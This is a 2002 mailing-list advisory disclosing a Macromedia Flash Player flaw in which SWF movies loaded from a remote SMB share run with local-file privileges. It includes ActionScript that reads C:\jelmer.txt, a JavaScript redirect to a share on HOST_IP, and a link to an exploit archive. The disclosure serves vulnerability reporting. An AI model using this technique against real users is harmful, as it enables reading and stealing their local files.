Flash player can read local files

From: jelmer (jkuperusat_private)
Date: Sun Oct 06 2002 - 05:24:00 PDT

    The following message apperently bounced the first time i send it :s

    Flash player can read local files

    Description

    There is a flaw in the macromedia flash player wich allows reading and
    sending of local files
    The flaw lies in the fact that when a flash movie is loaded from a remote
    smb share it is treated
    as though it was loaded from the users harddisk.
    Allowing the following action script code to work

    urlXML = new XML();
    urlXML.onLoad = readXML;
    myField = "Loading data...";
    urlXML.load("file:///C:/jelmer.txt");

    function readXML() {
     myField = urlXML.toString();
    }

    It uses the flash's xml control to read and display the contents of
    c:\jelmer.txt
    In order for it to work one has to get a user to view a specially crafted
    webpage wich could look like this

    <script language="javascript">
     document.location.href='\\\\HOST_IP\\exploit\\read.swf';
    </script>

    It points the browser to the swf on the smb share so that it displays it

    Demonstration

    Download the following file and extract the contained swf to a remote
    share,
    start it from there (  for instance by dragging it from the share into
    explorer or creating a html file as described above)

    http://www.xs4all.nl/~jkuperus/exploit.zip

    It will read and display the contents of c:\jelmer.txt

    A live demonstration is not provided because it really isn't good practice
    to open up smb shares to the
    outside world and i am only able to host this sort of stuff at my home
    server

    vendor status

    Macromedia was notified a long time ago  as far as I know they are still
    looking in to it.